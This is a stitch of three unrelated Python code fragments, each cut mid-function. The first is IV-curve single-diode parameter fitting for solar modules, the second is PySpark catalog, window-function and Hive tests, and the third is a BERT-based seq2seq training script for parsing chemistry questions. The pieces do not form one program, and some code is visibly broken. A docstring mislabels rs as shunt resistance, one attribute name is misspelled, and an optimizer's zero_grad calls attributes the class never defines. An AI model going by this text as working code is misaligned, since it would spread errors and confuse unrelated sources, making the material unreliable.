v_mp, i_mp : tuple
voltage ``v_mp`` and current ``i_mp`` at the maximum power point. [V],
[A]
"""
p = voltage * current
idx = np.argmax(p)
return voltage[idx], current[idx]
def _sandia_beta0_beta1(v, i, vlim, v_oc):
# Used by fit_sandia_simple.
# Get intercept and slope of linear portion of IV curve.
# Start with V =< vlim * v_oc, extend by adding points until slope is
# negative (downward).
beta0 = np.nan
beta1 = np.nan
first_idx = np.searchsorted(v, vlim * v_oc)
for idx in range(first_idx, len(v)):
coef = np.polyfit(v[:idx], i[:idx], deg=1)
if coef[0] < 0:
# intercept term
beta0 = coef[1].item()
# sign change of slope to get positive parameter value
beta1 = -coef[0].item()
break
if any(np.isnan([beta0, beta1])):
raise RuntimeError("Parameter extraction failed: beta0={}, beta1={}"
.format(beta0, beta1))
else:
return beta0, beta1
def _sandia_beta3_beta4(voltage, current, beta0, beta1, ilim, i_sc):
# Used by fit_sde_sandia.
# Subtract the IV curve from the linear fit.
y = beta0 - beta1 * voltage - current
x = np.array([np.ones_like(voltage), voltage, current]).T
# Select points where y > ilim * i_sc to regress log(y) onto x
idx = (y > ilim * i_sc)
result = np.linalg.lstsq(x[idx], np.log(y[idx]), rcond=RCOND)
coef = result[0]
beta3 = coef[1].item()
beta4 = coef[2].item()
if any(np.isnan([beta3, beta4])):
raise RuntimeError("Parameter extraction failed: beta3={}, beta4={}"
.format(beta3, beta4))
else:
return beta3, beta4
def _sandia_simple_params(beta0, beta1, beta3, beta4, v_mp, i_mp, v_oc):
# Used by fit_sandia_simple.
nNsVth = 1.0 / beta3
rs = beta4 / beta3
gsh = beta1 / (1.0 - rs * beta1)
rsh = 1.0 / gsh
iph = (1 + gsh * rs) * beta0
# calculate I0
io_vmp = _calc_I0(v_mp, i_mp, iph, gsh, rs, nNsVth)
io_voc = _calc_I0(v_oc, 0, iph, gsh, rs, nNsVth)
if any(np.isnan([io_vmp, io_voc])) or ((io_vmp <= 0) and (io_voc <= 0)):
raise RuntimeError("Parameter extraction failed: I0 is undetermined.")
elif (io_vmp > 0) and (io_voc > 0):
io = 0.5 * (io_vmp + io_voc)
elif (io_vmp > 0):
io = io_vmp
else: # io_voc > 0
io = io_voc
return iph, io, rs, rsh, nNsVth
def _calc_I0(voltage, current, iph, gsh, rs, nNsVth):
return (iph - current - gsh * (voltage + rs * current)) / \
np.expm1((voltage + rs * current) / nNsVth)
def _fit_sandia_cocontent(voltage, current, nsvth):
"""
Regression technique to fit the single diode equation to data for a single
IV curve.
In general, not reliable for estimating parameters other than Rsh.
Parameters
----------
voltage : numeric
voltage for the IV curve in increasing order, the first value must be
0, the last value is taken as ``Voc``. [V]
current : numeric
current for the IV curve corresponding to ``voltage``, the first value
is taken as ``Isc``, the last value must be 0. [A]
nsvth : numeric
the thermal voltage for the module, equal to ``Ns`` (number of cells in
series) times ``Vth`` (thermal voltage per cell). [V]
Returns
-------
iph : numeric
photocurrent [A]
io : numeric
dark current [A]
rs : numeric
shunt resistance [ohm]
rsh | |
= dict((f.name, f) for f in spark.catalog.listFunctions("default"))
self.assertTrue(len(functions) > 200)
self.assertTrue("+" in functions)
self.assertTrue("like" in functions)
self.assertTrue("month" in functions)
self.assertTrue("to_date" in functions)
self.assertTrue("to_timestamp" in functions)
self.assertTrue("to_unix_timestamp" in functions)
self.assertTrue("current_database" in functions)
self.assertEquals(functions["+"], Function(
name="+",
description=None,
className="org.apache.spark.sql.catalyst.expressions.Add",
isTemporary=True))
self.assertEquals(functions, functionsDefault)
spark.catalog.registerFunction("temp_func", lambda x: str(x))
spark.sql("CREATE FUNCTION func1 AS 'org.apache.spark.data.bricks'")
spark.sql("CREATE FUNCTION some_db.func2 AS 'org.apache.spark.data.bricks'")
newFunctions = dict((f.name, f) for f in spark.catalog.listFunctions())
newFunctionsSomeDb = dict((f.name, f) for f in spark.catalog.listFunctions("some_db"))
self.assertTrue(set(functions).issubset(set(newFunctions)))
self.assertTrue(set(functions).issubset(set(newFunctionsSomeDb)))
self.assertTrue("temp_func" in newFunctions)
self.assertTrue("func1" in newFunctions)
self.assertTrue("func2" not in newFunctions)
self.assertTrue("temp_func" in newFunctionsSomeDb)
self.assertTrue("func1" not in newFunctionsSomeDb)
self.assertTrue("func2" in newFunctionsSomeDb)
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.listFunctions("does_not_exist"))
def test_list_columns(self):
from pyspark.sql.catalog import Column
spark = self.spark
spark.catalog._reset()
spark.sql("CREATE DATABASE some_db")
spark.sql("CREATE TABLE tab1 (name STRING, age INT) USING parquet")
spark.sql("CREATE TABLE some_db.tab2 (nickname STRING, tolerance FLOAT) USING parquet")
columns = sorted(spark.catalog.listColumns("tab1"), key=lambda c: c.name)
columnsDefault = sorted(spark.catalog.listColumns("tab1", "default"), key=lambda c: c.name)
self.assertEquals(columns, columnsDefault)
self.assertEquals(len(columns), 2)
self.assertEquals(columns[0], Column(
name="age",
description=None,
dataType="int",
nullable=True,
isPartition=False,
isBucket=False))
self.assertEquals(columns[1], Column(
name="name",
description=None,
dataType="string",
nullable=True,
isPartition=False,
isBucket=False))
columns2 = sorted(spark.catalog.listColumns("tab2", "some_db"), key=lambda c: c.name)
self.assertEquals(len(columns2), 2)
self.assertEquals(columns2[0], Column(
name="nickname",
description=None,
dataType="string",
nullable=True,
isPartition=False,
isBucket=False))
self.assertEquals(columns2[1], Column(
name="tolerance",
description=None,
dataType="float",
nullable=True,
isPartition=False,
isBucket=False))
self.assertRaisesRegexp(
AnalysisException,
"tab2",
lambda: spark.catalog.listColumns("tab2"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.listColumns("does_not_exist"))
def test_cache(self):
spark = self.spark
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab1")
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab2")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab1")
self.assertTrue(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab2")
spark.catalog.uncacheTable("tab1")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertTrue(spark.catalog.isCached("tab2"))
spark.catalog.clearCache()
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.isCached("does_not_exist"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.cacheTable("does_not_exist"))
self.assertRaisesRegexp(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.uncacheTable("does_not_exist"))
def test_read_text_file_list(self):
df = self.spark.read.text(['python/test_support/sql/text-test.txt',
'python/test_support/sql/text-test.txt'])
count = df.count()
self.assertEquals(count, 4)
def test_BinaryType_serialization(self):
# Pyrolite version <= 4.9 could not serialize BinaryType with Python3 SPARK-17808
schema = StructType([StructField('mybytes', BinaryType())])
data = [[bytearray(b'here is my data')],
[bytearray(b'and here is some more')]]
df = self.spark.createDataFrame(data, schema=schema)
df.collect()
def test_bucketed_write(self):
data = [
(1, "foo", 3.0), (2, "foo", 5.0),
(3, "bar", -1.0), (4, "bar", 6.0),
]
df = self.spark.createDataFrame(data, ["x", "y", "z"])
def count_bucketed_cols(names, table="pyspark_bucket"):
"""Given a sequence of column names and a table name
query the catalog and return number o columns which are
used for bucketing
"""
cols = self.spark.catalog.listColumns(table)
num = len([c for c in cols if c.name in names and c.isBucket])
return num
# Test write with one bucketing column
df.write.bucketBy(3, "x").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x"]), 1)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write two bucketing columns
df.write.bucketBy(3, "x", "y").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x", "y"]), 2)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort
df.write.bucketBy(2, "x").sortBy("z").mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x"]), 1)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with a list of columns
df.write.bucketBy(3, ["x", "y"]).mode("overwrite").saveAsTable("pyspark_bucket")
self.assertEqual(count_bucketed_cols(["x", "y"]), 2)
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort with a list of columns
(df.write.bucketBy(2, "x")
.sortBy(["y", "z"])
.mode("overwrite").saveAsTable("pyspark_bucket"))
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
# Test write with bucket and sort with multiple columns
(df.write.bucketBy(2, "x")
.sortBy("y", "z")
.mode("overwrite").saveAsTable("pyspark_bucket"))
self.assertSetEqual(set(data), set(self.spark.table("pyspark_bucket").collect()))
@unittest.skipIf(not _have_pandas, "Pandas not installed")
def test_to_pandas(self):
import numpy as np
schema = StructType().add("a", IntegerType()).add("b", StringType())\
.add("c", BooleanType()).add("d", FloatType())
data = [
(1, "foo", True, 3.0), (2, "foo", True, 5.0),
(3, "bar", False, -1.0), (4, "bar", False, 6.0),
]
df = self.spark.createDataFrame(data, schema)
types = df.toPandas().dtypes
self.assertEquals(types[0], np.int32)
self.assertEquals(types[1], np.object)
self.assertEquals(types[2], np.bool)
self.assertEquals(types[3], np.float32)
class HiveSparkSubmitTests(SparkSubmitTests):
def test_hivecontext(self):
# This test checks that HiveContext is using Hive metastore (SPARK-16224).
# It sets a metastore url and checks if there is a derby dir created by
# Hive metastore. If this derby dir exists, HiveContext is using
# Hive metastore.
metastore_path = os.path.join(tempfile.mkdtemp(), "spark16224_metastore_db")
metastore_URL = "jdbc:derby:;databaseName=" + metastore_path + ";create=true"
hive_site_dir = os.path.join(self.programDir, "conf")
hive_site_file = self.createTempFile("hive-site.xml", ("""
|<configuration>
| <property>
| <name>javax.jdo.option.ConnectionURL</name>
| <value>%s</value>
| </property>
|</configuration>
""" % metastore_URL).lstrip(), "conf")
script = self.createTempFile("test.py", """
|import os
|
|from pyspark.conf import SparkConf
|from pyspark.context import SparkContext
|from pyspark.sql import HiveContext
|
|conf = SparkConf()
|sc = SparkContext(conf=conf)
|hive_context = HiveContext(sc)
|print(hive_context.sql("show databases").collect())
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]",
"--driver-class-path", hive_site_dir, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("default", out.decode('utf-8'))
self.assertTrue(os.path.exists(metastore_path))
class SQLTests2(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.spark = SparkSession(cls.sc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
cls.spark.stop()
# We can't include this test into SQLTests because we will stop class's SparkContext and cause
# other tests failed.
def test_sparksession_with_stopped_sparkcontext(self):
self.sc.stop()
sc = SparkContext('local[4]', self.sc.appName)
spark = SparkSession.builder.getOrCreate()
df = spark.createDataFrame([(1, 2)], ["c", "c"])
df.collect()
class UDFInitializationTests(unittest.TestCase):
def tearDown(self):
if SparkSession._instantiatedSession is not None:
SparkSession._instantiatedSession.stop()
if SparkContext._active_spark_context is not None:
SparkContext._active_spark_contex.stop()
def test_udf_init_shouldnt_initalize_context(self):
from pyspark.sql.functions import UserDefinedFunction
UserDefinedFunction(lambda x: x, StringType())
self.assertIsNone(
SparkContext._active_spark_context,
"SparkContext shouldn't be initialized when UserDefinedFunction is created."
)
self.assertIsNone(
SparkSession._instantiatedSession,
"SparkSession shouldn't be initialized when UserDefinedFunction is created."
)
class HiveContextSQLTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
try:
cls.sc._jvm.org.apache.hadoop.hive.conf.HiveConf()
except py4j.protocol.Py4JError:
cls.tearDownClass()
raise unittest.SkipTest("Hive is not available")
except TypeError:
cls.tearDownClass()
raise unittest.SkipTest("Hive is not available")
os.unlink(cls.tempdir.name)
cls.spark = HiveContext._createForTesting(cls.sc)
cls.testData = [Row(key=i, value=str(i)) for i in range(100)]
cls.df = cls.sc.parallelize(cls.testData).toDF()
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name, ignore_errors=True)
def test_save_and_load_table(self):
df = self.df
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.saveAsTable("savedJsonTable", "json", "append", path=tmpPath)
actual = self.spark.createExternalTable("externalJsonTable", tmpPath, "json")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE externalJsonTable")
df.write.saveAsTable("savedJsonTable", "json", "overwrite", path=tmpPath)
schema = StructType([StructField("value", StringType(), True)])
actual = self.spark.createExternalTable("externalJsonTable", source="json",
schema=schema, path=tmpPath,
noUse="this options will not be used")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
defaultDataSourceName = self.spark.getConf("spark.sql.sources.default",
"org.apache.spark.sql.parquet")
self.spark.sql("SET spark.sql.sources.default=org.apache.spark.sql.json")
df.write.saveAsTable("savedJsonTable", path=tmpPath, mode="overwrite")
actual = self.spark.createExternalTable("externalJsonTable", path=tmpPath)
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
self.spark.sql("SET spark.sql.sources.default=" + defaultDataSourceName)
shutil.rmtree(tmpPath)
def test_window_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.partitionBy("value").orderBy("key")
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 1, 1, 1, 1, 1),
("2", 1, 1, 1, 3, 1, 1, 1, 1),
("2", 1, 2, 1, 3, 2, 1, 1, 1),
("2", 2, 2, 2, 3, 3, 3, 2, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_without_partitionBy(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.orderBy("key", df.value)
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 4, 1, 1, 1, 1),
("2", 1, 1, 1, 4, 2, 2, 2, 1),
("2", 1, 2, 1, 4, 3, 2, 2, 2),
("2", 2, 2, 2, 4, 4, 4, 3, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_cumulative_sum(self):
df = self.spark.createDataFrame([("one", 1), ("two", 2)], ["key", "value"])
from pyspark.sql import functions as F
# Test cumulative sum
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values less than JVM's Long.MinValue and make sure we don't overflow
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding - 1, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values greater than JVM's Long.MaxValue and make sure we don't overflow
frame_end = Window.unboundedFollowing + 1
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.currentRow, frame_end)))
rs = sorted(sel.collect())
expected = [("one", 3), ("two", 2)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_collect_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql import functions
self.assertEqual(
sorted(df.select(functions.collect_set(df.key).alias('r')).collect()[0].r),
[1, 2])
self.assertEqual(
sorted(df.select(functions.collect_list(df.key).alias('r')).collect()[0].r),
[1, 1, 1, 2])
self.assertEqual(
sorted(df.select(functions.collect_set(df.value).alias('r')).collect()[0].r),
["1", "2"])
self.assertEqual(
sorted(df.select(functions.collect_list(df.value).alias('r')).collect()[0].r),
["1", "2", "2", "2"])
def test_limit_and_take(self):
df = self.spark.range(1, 1000, numPartitions=10)
def assert_runs_only_one_job_stage_and_task(job_group_name, f):
tracker = self.sc.statusTracker()
self.sc.setJobGroup(job_group_name, description="")
f()
jobs = tracker.getJobIdsForGroup(job_group_name)
self.assertEqual(1, len(jobs))
stages = tracker.getJobInfo(jobs[0]).stageIds
self.assertEqual(1, len(stages))
self.assertEqual(1, tracker.getStageInfo(stages[0]).numTasks)
# Regression test for SPARK-10731: take should delegate to Scala implementation
assert_runs_only_one_job_stage_and_task("take", lambda: df.take(1))
# Regression test for SPARK-17514: limit(n).collect() should the perform same as take(n)
assert_runs_only_one_job_stage_and_task("collect_limit", lambda: df.limit(1).collect())
def test_datetime_functions(self):
from pyspark.sql import functions
from datetime import | |
<filename>examples/run_chemistry_parser.py<gh_stars>0
# coding=utf-8
# Copyright 2019 The HuggingFace Inc. team.
# Copyright (c) 2019 The HuggingFace Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning seq2seq models for sequence generation."""
import argparse
import functools
import logging
import os
import random
import sys
sys.path.append(r'../')
import numpy as np
from tqdm import tqdm, trange
import torch
from torch.optim import Adam
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import (
AutoTokenizer,
BertForMaskedLM,
BertConfig,
PreTrainedEncoderDecoder,
Model2Models,
)
from utils_summarization import (
CNNDailyMailDataset,
encode_for_summarization,
fit_to_block_size,
build_lm_labels,
build_mask,
compute_token_type_ids,
)
from utils_chemistry import (ChemistryDataset,)
'''
class InputExample(object):
def __init__(self,example_id,question_input,question_varible_output=None,condition_output=None):
self.example_id=example_id
self.question_input=question_input
self.question_varible_output=question_varible_output
self.condition_output=condition_output
'''
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# ------------
# Load dataset
# ------------
def load_and_cache_examples(args, tokenizer, prefix="train"):
dataset = ChemistryDataset(tokenizer, prefix=prefix, data_dir=args.data_dir)
return dataset
def collate(data, tokenizer, input_block_size,output_block_size):
""" List of tuple as an input. """
question_inputs=[]
question_varible_outputs=[]
condition_outputs=[]
for i,example in enumerate(data):
question_input=tokenizer.encode(example.question_input)
question_input=fit_to_block_size(question_input, input_block_size, tokenizer.pad_token_id)
question_inputs.append(question_input)
if example.question_varible_output is not None:
question_varible_output=tokenizer.encode(example.question_varible_output)
else:
question_varible_output=tokenizer.build_inputs_with_special_tokens([])
question_varible_output=fit_to_block_size(question_varible_output, output_block_size, tokenizer.pad_token_id)
question_varible_outputs.append(question_varible_output)
if example.condition_output is not None:
condition_output=tokenizer.encode(example.condition_output)
else:
condition_output=tokenizer.build_inputs_with_special_tokens([])
condition_output=fit_to_block_size(condition_output, output_block_size, tokenizer.pad_token_id)
condition_outputs.append(condition_output)
question_inputs = torch.tensor(question_inputs)
question_varible_outputs = torch.tensor(question_varible_outputs)
condition_outputs = torch.tensor(condition_outputs)
question_inputs_mask = build_mask(question_inputs, tokenizer.pad_token_id)
question_varible_outputs_mask = build_mask(question_varible_outputs, tokenizer.pad_token_id)
condition_outputs_mask = build_mask(condition_outputs, tokenizer.pad_token_id)
question_varible_outputs_mask_lm_labels = build_lm_labels(question_varible_outputs, tokenizer.pad_token_id)
condition_outputs_mask_lm_labels = build_lm_labels(condition_outputs, tokenizer.pad_token_id)
return (
question_inputs,
[question_varible_outputs,condition_outputs],
question_inputs_mask,
[question_varible_outputs_mask,condition_outputs_mask],
[question_varible_outputs_mask_lm_labels,condition_outputs_mask_lm_labels],
)
# ----------
# Optimizers
# ----------
class BertSumOptimizer(object):
""" Specific optimizer for BertSum.
As described in [1], the authors fine-tune BertSum for abstractive
summarization using two Adam Optimizers with different warm-up steps and
learning rate. They also use a custom learning rate scheduler.
[1] Liu, Yang, and <NAME>. "Text summarization with pretrained encoders."
arXiv preprint arXiv:1908.08345 (2019).
"""
def __init__(self, model, lr, warmup_steps, beta_1=0.99, beta_2=0.999, eps=1e-8):
self.encoder = model.encoder
self.decoders = model.decoders
self.lr = lr
self.warmup_steps = warmup_steps
self.decoders_parameters=[]
for decoder in model.decoders:
self.decoders_parameters+=decoder.parameters()
self.optimizers = {
"encoder": Adam(
model.encoder.parameters(),
lr=lr["encoder"],
betas=(beta_1, beta_2),
eps=eps,
),
"decoder": Adam(
self.decoders_parameters,
lr=lr["decoder"],
betas=(beta_1, beta_2),
eps=eps,
),
}
self._step = 0
def _update_rate(self, stack):
return self.lr[stack] * min(
self._step ** (-0.5), self._step * self.warmup_steps[stack] ** (-0.5)
)
def zero_grad(self):
self.optimizer_decoder.zero_grad()
self.optimizer_encoder.zero_grad()
def step(self):
self._step += 1
for stack, optimizer in self.optimizers.items():
new_rate = self._update_rate(stack)
for param_group in optimizer.param_groups:
param_group["lr"] = new_rate
optimizer.step()
# ------------
# Train
# ------------
def train(args, model, tokenizer):
""" Fine-tune the pretrained model on the corpus. """
set_seed(args)
# Load the data
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_dataset = load_and_cache_examples(args, tokenizer, "train")
train_sampler = RandomSampler(train_dataset)
model_collate_fn = functools.partial(collate, tokenizer=tokenizer,
input_block_size=args.input_block_size,output_block_size=args.output_block_size)
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
batch_size=args.train_batch_size,
collate_fn=model_collate_fn,
)
# Training schedule
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = t_total // (
len(train_dataloader) // args.gradient_accumulation_steps + 1
)
else:
t_total = (
len(train_dataloader)
// args.gradient_accumulation_steps
* args.num_train_epochs
)
# Prepare the optimizer
#lr = {"encoder": 0.002, "decoder": 0.2}
lr = {"encoder": args.encoder_lr, "decoder": args.decoder_lr}
#warmup_steps = {"encoder": 20000, "decoder": 10000}
warmup_steps = {"encoder": args.encoder_warmup, "decoder": args.decoder_warmup}
optimizer = BertSumOptimizer(model, lr, warmup_steps)
# Train
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(
" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size
)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size * args.gradient_accumulation_steps
# * (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
model.zero_grad()
train_iterator = trange(args.num_train_epochs, desc="Epoch", disable=False)
global_step = 0
tr_loss = 0.0
for _ in train_iterator:
epoch_iterator = tqdm(train_dataloader, desc="Iteration", disable=False)
for step, batch in enumerate(epoch_iterator):
source, target, encoder_mask, decoder_mask, lm_labels = batch
#print('source: {}'.format(source))
#print('target: {}'.format(target))
feed_source=None
feed_targets=[None]*len(target)
feed_encoder_mask=None
feed_decoder_masks=[None]*len(decoder_mask)
feed_lm_labels=[None]*len(lm_labels)
feed_source = source.to(args.device)
for i in range(len(target)):
feed_targets[i] = target[i].to(args.device)
feed_encoder_mask = encoder_mask.to(args.device)
for i in range(len(decoder_mask)):
feed_decoder_masks[i] = decoder_mask[i].to(args.device)
for i in range(len(lm_labels)):
feed_lm_labels[i] = lm_labels[i].to(args.device)
model.train()
#print('debug by zhuoyu: source = {}'.format(source))
#print('debug by zhuoyu: target = {}'.format(target))
#print('debug by zhuoyu, device:')
#print('feed source {}'.format(feed_source.device))
#print('feed target {}'.format([str(feed_target.device) for feed_target in feed_targets]))
#print('feed encoder mask {}'.format(feed_encoder_mask.device))
#print('feed decoder masks {}'.format([str(feed_decoder_mask.device) for feed_decoder_mask in feed_decoder_masks]))
#print('feed lm labels {}'.format([str(feed_lm_label.device) for feed_lm_label in feed_lm_labels]))
outputs = model(
feed_source,
feed_targets,
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks,
decoder_lm_labels=feed_lm_labels,
)
loss=0
for i in range(len(model.decoders)):
#print('outputs[{}][0] type: {}'.format(i,type(outputs[i][0])))
loss += outputs[i][0]
#print(loss)
if args.gradient_accumulation_steps > 1:
loss /= args.gradient_accumulation_steps
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
model.zero_grad()
global_step += 1
if args.max_steps > 0 and global_step > args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step > args.max_steps:
train_iterator.close()
break
return global_step, tr_loss / global_step
# ------------
# Train
# ------------
def evaluate(args, model, tokenizer, prefix=""):
set_seed(args)
args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
eval_dataset = load_and_cache_examples(args, tokenizer, prefix="dev")
#for example in eval_dataset.examples:
# print(example.example_id)
# print(example.question_input)
# print(example.question_varible_output)
# print(example.condition_output)
#exit(-1)
eval_sampler = SequentialSampler(eval_dataset)
model_collate_fn = functools.partial(collate, tokenizer=tokenizer,
input_block_size=args.input_block_size,output_block_size=args.output_block_size)
eval_dataloader = DataLoader(
eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size,collate_fn=model_collate_fn,
)
# multi-gpu evaluate
#if args.n_gpu > 1:
# model = torch.nn.DataParallel(model)
logger.info("***** Running evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
model.eval()
fout=open(os.path.join(args.output_dir,"dev.res"),'w',encoding='utf-8')
fdebug=open(os.path.join(args.output_dir,"dev.debug.res"),'w',encoding='utf-8')
for batch in tqdm(eval_dataloader, desc="Evaluating"):
source, target, encoder_mask, decoder_mask, lm_labels = batch
#print('[SOURCE]: {}'.format(source))
#print('[TARGET]: {}'.format(target))
#source = source.to(args.device)
#target = target.to(args.device)
#encoder_mask = encoder_mask.to(args.device)
#decoder_mask = decoder_mask.to(args.device)
#lm_labels = lm_labels.to(args.device)
feed_source = None
feed_targets = [None] * len(target)
feed_encoder_mask = None
feed_decoder_masks = [None] * len(decoder_mask)
feed_lm_labels = [None] * len(lm_labels)
feed_source = source.to(args.device)
for i in range(len(target)):
feed_targets[i] = target[i].to(args.device)
feed_encoder_mask = encoder_mask.to(args.device)
for i in range(len(decoder_mask)):
feed_decoder_masks[i] = decoder_mask[i].to(args.device)
for i in range(len(lm_labels)):
feed_lm_labels[i] = lm_labels[i].to(args.device)
with torch.no_grad():
if args.decoding_type=='decoding':
tokens_roles=[]
for i in range(len(feed_targets)):
outputs_ids=model.decoding(
feed_source,
feed_targets[i],
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks[i],
decoder_lm_labels=feed_lm_labels[i],
decoder=model.decoders[i]
#fdebug=fdebug,
)
print('outputs size: {}'.format(outputs_ids.size()))
outputs_ids =outputs_ids.cpu().numpy()
batch_tokens=[]
for idx in outputs_ids:
tokens = []
for id in idx:
#print('{}\t{}'.format(id,type(id)))
tokens.append(tokenizer.ids_to_tokens.get(int(id), tokenizer.unk_token))
batch_tokens.append(tokens)
tokens_roles.append(batch_tokens)
def subtoken2token(subtokens):
token=""
tokens=[]
for subtoken in subtokens:
if subtoken.startswith("##"):
token+=subtoken[2:]
else:
if token!="":
tokens.append(token)
token=subtoken
if token!="":
tokens.append(token)
return tokens
for i in range(len(tokens_roles[0])):
fout.write('\t'.join([' '.join(subtoken2token(tokens_roles[0][i]))
